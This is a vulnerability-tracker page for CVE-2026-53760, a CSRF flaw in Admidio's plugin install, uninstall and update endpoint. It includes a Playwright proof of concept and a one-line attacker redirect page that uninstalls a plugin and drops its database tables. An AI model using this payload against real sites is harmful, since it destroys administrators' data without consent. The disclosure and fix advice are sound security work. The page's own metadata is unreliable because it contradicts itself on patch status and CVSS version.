CVE-2026-53760

MEDIUMPre-NVD 5.25.2
EchelonGraph scoreHIGH confidence

Score 5.2 from GitHub Security Advisory published 2026-07-09. the CNA's CVSS baseline 5.2; sources differ by 0.0.

Triggered by: GitHub Security Advisory CVSS
Sources: cna:github_m, ghsa
5.2
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: CVSS: 5.2Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Admidio: CSRF on Plugin Install, Uninstall, and Update via Unprotected GET Requests

Summary

The modules/plugins.php endpoint handles plugin installation, uninstallation, and update operations via GET requests without CSRF token validation. Because these are top-level navigations, browsers include SameSite=Lax session cookies. An attacker crafts a malicious page that, when an authenticated administrator visits it, triggers arbitrary plugin operations. The uninstall operation executes DROP TABLE SQL scripts and destroys plugin data.

Details

modules/plugins.php reads the mode (install, uninstall, update) and name parameters directly from $_GET:

// modules/plugins.php
$mode = admFuncVariableIsValid($_GET, 'mode', 'string');
$pluginName = admFuncVariableIsValid($_GET, 'name', 'string');

The file contains zero calls to SecurityUtils::validateCsrfToken(). Other administrative operations in the same codebase (such as the save mode in preferences) validate CSRF tokens correctly.

Because the operations use GET requests, modern browsers send SameSite=Lax cookies on top-level GET navigations (link clicks, redirects, window.location assignments). A cross-origin page triggers these operations by navigating the browser to the vulnerable URL.

The doUninstall() function is the most destructive path. It executes SQL scripts from the plugin's db_scripts/ directory, which contain DROP TABLE statements:

// modules/plugins.php - doUninstall()
function doUninstall($pluginFolder) {
    // Reads and executes SQL from $pluginFolder/db_scripts/uninstall.sql
    // Contains DROP TABLE statements
}

Proof of Concept

The following Playwright test demonstrates a cross-origin CSRF attack. An attacker hosts a page on a different origin that redirects an authenticated administrator's browser to the uninstall endpoint:

// playwright-csrf-poc.js
const { test, expect } = require('@playwright/test');

test('CSRF plugin uninstall via cross-origin redirect', async ({ browser }) => { const context = await browser.newContext(); const page = await context.newPage();

// Step 1: Admin logs in to Admidio await page.goto('https://admidio.example.com/adm_program/system/login.php'); await page.fill('#usr_login_name', 'admin'); await page.fill('#usr_password', 'password'); await page.click('#btn_login'); await page.waitForURL('**/overview.php');

// Step 2: Admin visits attacker-controlled page on different origin // The attacker page contains: // window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday'; await page.goto('https://attacker.example.com/csrf.html');

// Step 3: Browser follows redirect with SameSite=Lax cookies // The birthday plugin is uninstalled, its database tables dropped await page.waitForURL('**/plugins.php*');

// Verify the plugin was uninstalled await page.goto('https://admidio.example.com/adm_program/modules/plugins.php'); const content = await page.content(); expect(content).not.toContain('birthday'); });

Simplified attacker page (csrf.html hosted on attacker origin):

window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday';

When an administrator visits this page, the browser navigates to the Admidio uninstall URL with full session cookies, and the server uninstalls the birthday plugin.

Impact

An unauthenticated attacker tricks an Admidio administrator into visiting a malicious web page (via phishing, forum post, or embedded content) that performs plugin operations without visible indication. The uninstall operation executes DROP TABLE statements, causing irreversible data loss. The install operation activates plugins with known vulnerabilities. The update operation disrupts plugin functionality. The victim only needs to visit a single page.

Recommended Fix

Switch plugin install, uninstall, and update operations from GET to POST requests. Add SecurityUtils::validateCsrfToken() checks to all state-changing operations in modules/plugins.php, consistent with the pattern used elsewhere in the codebase.


*Found by aisafe.io*

CVSS v3
5.2
EG Score
5.2(high)
EPSS
KEV
Not listed

Published

July 9, 2026

Last Modified

July 9, 2026

Vendor Advisories for CVE-2026-53760(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Patch Availability(1)

Vendor / EcosystemFixed in / PatchReleasedSource
composeradmidio/admidioghsa

Patches are aggregated from vendor advisories (Red Hat, Microsoft, Cisco, GitHub) and package ecosystems (OSV, GHSA). Multiple rows for the same upstream release have been deduplicated.

Weakness Classification(1)

MITRE Common Weakness Enumeration — the root-cause categories this CVE belongs to.

Data Freshness Timeline

(refreshed 14× in last 7d / 14× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-15 08:17 UTCEG score recompute
  2. 2026-07-15 08:17 UTCGHSA enrichment
  3. 2026-07-14 09:12 UTCEG score recompute
  4. 2026-07-14 09:12 UTCGHSA enrichment
  5. 2026-07-13 10:07 UTCEG score recompute
  6. 2026-07-13 10:07 UTCGHSA enrichment
  7. 2026-07-12 11:02 UTCEG score recompute
  8. 2026-07-12 11:02 UTCGHSA enrichment
  9. 2026-07-11 11:57 UTCEG score recompute
  10. 2026-07-11 11:57 UTCGHSA enrichment
  11. 2026-07-10 12:53 UTCEG score recompute
  12. 2026-07-10 12:53 UTCGHSA enrichment
  13. 2026-07-09 13:45 UTCEG score recompute
  14. 2026-07-09 13:45 UTCGHSA enrichment

Frequently asked(4)

What is CVE-2026-53760?
CVE-2026-53760 is a medium vulnerability published on July 9, 2026. Admidio: CSRF on Plugin Install, Uninstall, and Update via Unprotected GET Requests Summary The modules/plugins.php endpoint handles plugin installation, uninstallation, and update operations via GET requests without CSRF token validation. Because these are top-level navigations, browsers include…
When was CVE-2026-53760 disclosed?
CVE-2026-53760 was first published in the National Vulnerability Database on July 9, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-53760?
CVE-2026-53760 has a CVSS v4.0 base score of 5.2 (CNA self-assessment; NVD's own analysis pending).
How do I remediate CVE-2026-53760?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-53760, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-53760

Explore →

Is Your Infrastructure Affected by CVE-2026-53760?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.